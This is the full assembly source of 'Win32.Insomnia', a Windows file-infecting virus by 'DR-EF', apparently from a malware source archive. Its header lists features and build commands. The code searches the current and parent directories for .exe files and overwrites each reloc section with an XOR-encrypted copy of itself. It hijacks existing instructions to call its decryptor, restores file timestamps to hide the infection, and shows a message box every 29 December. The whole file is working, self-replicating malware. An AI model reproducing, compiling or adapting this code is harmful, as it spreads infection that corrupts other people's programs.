MalwareSourceCode/Win32/Infector/Win32.Insomnia.asm
2020-11-14 20:02:18 -06:00

469 lines
10 KiB
NASM
Raw Blame History

; Win32.Insomnia (c) DR-EF.
;--------------------------------------------------
;virus name:Win32.Insomnia
;virus author:DR-EF
;virus size:1972 bytes
;features:
; o dont increase file size,overwrite reloc
; section instead.
; o use EPO - replace all mov eax,fs:[00000000]
; instructions with call virus decryptor.
; o encrypted with new key for each file.
; o use the dotdot method to find files.
;payload:messagebox with this text:
; ".:[Win32.Insomnia <20> 2004 DR-EF]:."
; every year at 29/12.
;compile:
; tasm32 /m3 /ml /zi Insomnia.asm , , ;
; tlink32 /tpe /aa /v Insomnia , Insomnia,,import32.lib
; pewrsec Insomnia.exe
;--------------------------------------------------
.386
.model flat
extrn ExitProcess:proc
virus_size equ (EndVirus-virus_start)
INVALID_HANDLE_VALUE equ -1
FILE_ATTRIBUTE_NORMAL equ 00000080h
OPEN_EXISTING equ 3
GENERIC_WRITE equ 40000000h
GENERIC_READ equ 80000000h
PAGE_READWRITE equ 4h
FILE_MAP_WRITE equ 00000002h
.data
db ?
.code
virus_start:
call Delta
Delta: pop ebp
sub ebp,offset Delta
mov ecx,NumberOfKernelBases
lea esi,[ebp + KernelBaseTable]
@next_k:lodsd
call GetKernel32Base
jc GetApis
loop @next_k
jmp reth ;return to host
KernelBaseTable:
dd 804d4000h ;winXP
dd 0bff60000h ;winME
dd 77f00000h ;winNT
dd 77e70000h ;win2K
dd 0bff70000h ;win9X
NumberOfKernelBases equ 5h
GetApis:mov eax,[ebp + kernel32base]
add eax,[eax + 3ch]
mov eax,[eax + 78h]
add eax,[ebp + kernel32base]
;eax - kernel32 export table
push eax
xor edx,edx
mov eax,[eax + 20h]
add eax,[ebp + kernel32base]
mov edi,[eax]
add edi,[ebp + kernel32base]
;edi - api names array
dec edi
nxt_cmp:inc edi
lea esi,[ebp + _GetProcAddress]
mov ecx,0eh
rep cmpsb
je search_address
inc edx
nxt_l: cmp byte ptr [edi],0h
je nxt_cmp
inc edi
jmp nxt_l
search_address:
pop eax
;eax - kernel32 export table
;edx - GetProcAddress position
shl edx,1h
mov ebx,[eax + 24h]
add ebx,[ebp + kernel32base]
add ebx,edx
mov dx,word ptr [ebx]
shl edx,2h
mov ebx,[eax + 1ch]
add ebx,[ebp + kernel32base]
add ebx,edx
mov ebx,[ebx]
add ebx,[ebp + kernel32base]
mov [ebp + GetProcAddress],ebx
mov ecx,NumberOfApis
lea eax,[ebp + ApiNamesTable]
lea ebx,[ebp + ApiAddressTable]
nxt_api:push ecx
push eax
push eax
push [ebp + kernel32base]
call [ebp + GetProcAddress]
or eax,eax
je api_err
mov dword ptr [ebx],eax
pop eax
nxt_al: inc eax
cmp byte ptr [eax],0h
jne nxt_al
inc eax
add ebx,4h
pop ecx
loop nxt_api
jmp InfectFiles
api_err:add esp,8h
jmp reth
_GetProcAddress db "GetProcAddress",0
GetProcAddress dd 0
kernel32base dd 0
ApiNamesTable:
_FindFirstFile db "FindFirstFileA",0
_FindNextFile db "FindNextFileA",0
_GetCurrentDirectory db "GetCurrentDirectoryA",0
_SetCurrentDirectory db "SetCurrentDirectoryA",0
_CreateFile db "CreateFileA",0
_CloseHandle db "CloseHandle",0
_CreateFileMapping db "CreateFileMappingA",0
_MapViewOfFile db "MapViewOfFile",0
_UnmapViewOfFile db "UnmapViewOfFile",0
_GetLocalTime db "GetLocalTime",0
_LoadLibrary db "LoadLibraryA",0
_SetFileTime db "SetFileTime",0
ApiAddressTable:
FindFirstFile dd 0
FindNextFile dd 0
GetCurrentDirectory dd 0
SetCurrentDirectory dd 0
CreateFile dd 0
CloseHandle dd 0
CreateFileMapping dd 0
MapViewOfFile dd 0
UnmapViewOfFile dd 0
GetLocalTime dd 0
LoadLibrary dd 0
SetFileTime dd 0
NumberOfApis equ 12
GetKernel32Base:
pushad
lea ebx,[ebp + k32err]
push ebx
xor ebx,ebx
push dword ptr fs:[ebx]
mov fs:[ebx],esp
mov ebx,eax
cmp word ptr [eax],"ZM"
jne _k32err
add eax,[eax + 3ch]
cmp word ptr [eax],"EP"
jne _k32err
mov [ebp + kernel32base],ebx
pop dword ptr fs:[0]
add esp,4h
popad
stc
ret
_k32err:pop dword ptr fs:[0]
add esp,4h
popad
clc
ret
k32err: mov esp,[esp + 8h]
pop dword ptr fs:[0]
add esp,4h
popad
clc
ret
VirusCopyRight db ".:[Win32.Insomnia <20> 2004 DR-EF]:.",0
InfectFiles:
mov [ebp + max_dirs],0fh
lea eax,[ebp + cdir]
push eax
push 0ffh
call [ebp + GetCurrentDirectory]
or eax,eax
je ReturnToHost
s_files:cmp [ebp + max_dirs],0h
je r_dir
lea eax,[ebp + WIN32_FIND_DATA]
push eax
lea eax,[ebp + search_mask]
push eax
call [ebp + FindFirstFile]
cmp eax,INVALID_HANDLE_VALUE
je nxt_dir
mov [ebp + hfind],eax
i_file: call InfectFile
lea eax,[ebp + WIN32_FIND_DATA]
push eax
push [ebp + hfind]
call [ebp + FindNextFile]
or eax,eax
jne i_file
nxt_dir:dec [ebp + max_dirs]
lea eax,[ebp + dotdot]
push eax
call [ebp + SetCurrentDirectory]
or eax,eax
jne s_files
r_dir: lea eax,[ebp + cdir]
push eax
call [ebp + SetCurrentDirectory]
ReturnToHost:
;check for payload:
lea eax,[ebp + SYSTEMTIME]
push eax
call [ebp + GetLocalTime]
cmp word ptr [ebp + wMonth],0ch
jne reth
cmp word ptr [ebp + wDay],1dh
jne reth
lea eax,[ebp + user32dll]
push eax
call [ebp + LoadLibrary]
or eax,eax
je reth
lea ebx,[ebp + MessageBox]
push ebx
push eax
call [ebp + GetProcAddress]
or eax,eax
je reth
xor ecx,ecx
push MB_ICONINFORMATION or MB_SYSTEMMODAL
push ecx
lea ebx,[ebp + VirusCopyRight]
push ebx
push ecx
call eax
reth: popfd
popad
db 64h,0A1h,0,0,0,0 ;mov eax,fs:[00000000]
ret
SYSTEMTIME:
wYear dw 0
wMonth dw 0
wDayOfWeek dw 0
wDay dw 0
wHour dw 0
wMinute dw 0
wSecond dw 0
wMilliseconds dw 0
user32dll db "user32.dll",0
MessageBox db "MessageBoxA",0
MB_SYSTEMMODAL equ 00001000h
MB_ICONINFORMATION equ 00000040h
hfind dd 0
max_dirs db 0fh
search_mask db "*.exe",0
dotdot db "..",0
cdir db 0ffh dup(0)
WIN32_FIND_DATA:
dwFileAttributes dd 0
ftCreationTime dq 0
ftLastAccessTime dq 0
ftLastWriteTime dq 0
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0
dwReserved1 dd 0
cFileName db 0ffh dup (0)
cAlternateFileName db 20 dup (0)
InfectFile:
inc byte ptr [ebp + decrypt_key] ;create new key
lea ebx,[ebp + cFileName]
xor eax,eax
push eax
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push eax
push eax
push GENERIC_READ or GENERIC_WRITE
push ebx
call [ebp + CreateFile]
cmp eax,INVALID_HANDLE_VALUE
je ExitInfect
mov [ebp + hfile],eax
xor eax,eax
push eax
push eax
push eax
push PAGE_READWRITE
push eax
push [ebp + hfile]
call [ebp + CreateFileMapping]
or eax,eax
je close_f
mov [ebp + hmap],eax
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_WRITE
push [ebp + hmap]
call [ebp + MapViewOfFile]
or eax,eax
je close_m
mov [ebp + mapbase],eax
;check for valid pe file
cmp word ptr [eax],"ZM"
jne CloseFile
add eax,[eax + 3ch]
cmp word ptr [eax],"EP"
jne CloseFile
;goto sections table
mov cx,[eax + 6h] ; get number of sections
and ecx,0ffffh
mov ebx,[eax + 34h];get image base
mov dword ptr [ebp + Virus_Start],ebx ;save image base insaid decryptor
mov ebx,[eax + 74h];get number of datadirectory
shl ebx,3h
add eax,ebx
add eax,78h
push eax ;eax - sections table
push ecx ;ecx - number of sections
;check for reloc section
@sec: cmp dword ptr [eax],"ler."
jne nxt_sec
cmp dword ptr [eax + 2h],"cole"
je f_rec
nxt_sec:add eax,28h
loop @sec
ext_rlc:add esp,8h ;restore stack
jmp CloseFile
;check if the reloc section is bigger than virus
f_rec: cmp dword ptr [eax + 8h],virus_size ;eax - reloc section header !
jb ext_rlc
;set new section flags
or dword ptr [eax + 24h],0c0000020h ;code\readable\writeable
;goto the section raw data:
mov edx,[eax + 0ch]
mov eax,[eax + 14h]
add eax,[ebp + mapbase]
;overwrite the reloc section with the virus
mov edi,eax
lea esi,[ebp + virus_start]
mov ecx,virus_size
@enc: lodsb
xor al,byte ptr [ebp + decrypt_key]
stosb
loop @enc
pop ecx ;ecx - number of sections
pop ebx ;ebx - sections table
sub eax,[ebp + mapbase]
add dword ptr [ebp + Virus_Start],edx ;eax - virus start infected files
@sec2: cmp dword ptr [ebx + 1h],"txet" ;text ?
je f_cod
cmp dword ptr [ebx + 1h],"edoc" ;code ?
je f_cod
cmp dword ptr [ebx],"EDOC" ;CODE ?
je f_cod
add ebx,28h
loop @sec2
add esp,4h ;restore stack
jmp CloseFile
;ebx - code section header
f_cod: mov ecx,[ebx + 10h] ;ecx - size of section raw data
mov edx,[ebx + 8h] ;edx - virtual section size
sub ecx,edx
cmp ecx,DecryptorSize
ja write_d
add esp,4h
jmp CloseFile
write_d:mov edi,[ebx + 14h]
mov [ebp + virus_entry_point],edi
add [ebp + virus_entry_point],edx
add edi,[ebp + mapbase]
push edi ;save code section raw data
add edi,edx ;esi - where to write virus decryptor
lea esi,[ebp + VirusDecryptorStart]
mov ecx,DecryptorSize
rep movsb
pop esi ;esi - code section raw data
;search for all mov eax,fs:[00000000] and replace it with nop --> call virus_decryptor
xchg edx,ecx ;ecx - code section virtual size
@1: cmp word ptr [esi],0a164h
jne nxt_w
cmp dword ptr [esi + 2],0
jne nxt_w
;esi - mov eax,fs:[00000000] location.
mov byte ptr [esi],90h ;nop
mov byte ptr [esi + 1h],0e8h;call
mov eax,[ebp + virus_entry_point]
mov ebx,esi
sub ebx,[ebp + mapbase]
sub eax,ebx
sub eax,6h
mov dword ptr [esi + 2h],eax
nxt_w: inc esi
loop @1
CloseFile:
push [ebp + mapbase]
call [ebp + UnmapViewOfFile]
close_m:push [ebp + hmap]
call [ebp + CloseHandle]
close_f:lea eax,[ebp + ftLastWriteTime]
push eax
lea eax,[ebp + ftLastAccessTime]
push eax
lea eax,[ebp + ftCreationTime]
push eax
push [ebp + hfile]
call [ebp + SetFileTime]
push [ebp + hfile]
call [ebp + CloseHandle]
ExitInfect:
ret
VirusDecryptorStart equ $
pushad
pushfd
mov esi,00000000
Virus_Start equ $-4
push esi
mov edi,esi
mov ecx,virus_size
@dcrypt:lodsb
xor al,5h
decrypt_key equ $-1
stosb
loop @dcrypt
ret
EndVirusDecryptor equ $
DecryptorSize equ (EndVirusDecryptor - VirusDecryptorStart)
hfile dd 0
hmap dd 0
mapbase dd 0
virus_entry_point dd 0
EndVirus equ $
First_Gen_Host:
push offset exit
pushfd
pushad
jmp virus_start
exit: push eax
call ExitProcess
end First_Gen_Host